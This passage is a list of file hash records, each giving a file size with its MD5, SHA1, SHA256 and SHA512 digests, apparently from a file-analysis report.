SHA512ed8f421e151d797b33440dd0ddb6d6a5ec93fe7806ad82c60af3f77d545cf5dc319bce67804bd0613bb551a3f01648ec0d1918805dc7342145c8bb23ad12cab4
-
Filesize
944B
MD5f8c40f7624e23fa92ae2f41e34cfca77
SHA120e742cfe2759ac2adbc16db736a9e143ca7b677
SHA256c51a52818a084addbfa913d2bb4bb2b0e60c287a4cf98e679f18b8a521c0aa7b
SHA512f1da3ec61403d788d417d097a7ed2947203c6bff3cf1d35d697c31edecdf04710b3e44b2aa263b886e297b2ce923fea410ccc673261928f1d0cd81252740dbe7
-
Filesize
944B
MD521017c68eaf9461301de459f4f07e888
SHA141ff30fc8446508d4c3407c79e798cf6eaa5bb73
SHA25603b321e48ff3328d9c230308914961fe110c4c7bc96c0a85a296745437bcb888
SHA512956990c11c6c1baa3665ef7ef23ef6073e0a7fcff77a93b5e605a83ff1e60b916d80d45dafb06977aed90868a273569a865cf2c623e295b5157bfff0fb2be35d
-
Filesize
1.8MB
MD5a522a3d64b6e57e8cf9c5e390d7db83a
SHA107f4c37b9b0a0e331b5d7088549caed05eb5794b
SHA256f10c4a499b5f7e8d26ff0397ceaf94ea3d3ba43617087ea68b2cb43b99da0f30
SHA51214a6d5c64c11ddb2d4be7df2d11c082f265b7492d76270282a60592118701c520a625aa4fb3be4676325aed1b126f7f3a1975e885adbdebf12ff3c499676e398
-
Filesize
199KB
MD573309cc961f9645c1c2562ffcdc2dab1
SHA16a8545c08c931e016198c80b304ade1c1e8f7a17
SHA256287e94024ef4ea0f1d9aad740b75a2ff594dd93062848867ed028ac719143298
SHA51289858a407acbc7c13a4bd40031abd6803c311d381a37702631b1739d9f0e67c6afae50e6d1188b54a7d0e1ddfbcb6857b68f8f44cad3b10b1b31b53f1b676914
-
Filesize
1.7MB
MD5d5be6b852722db508fdb29104d5aa037
SHA189e8ea27ef760ee059731380397446c1cf03c55d
SHA25671bb87a3b9150e8951eab42f842a784a8cbb6c6f4556d44d3f814f47dc584d94
SHA512ba62ca856fb72f3a68edc50bbb8e8ab914d6f9526d5d84a92ff0f25aa57e149e742e881bf7a967f3a40b445725fffd6d1f6f141f94fe9f271fb04103761b516b
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82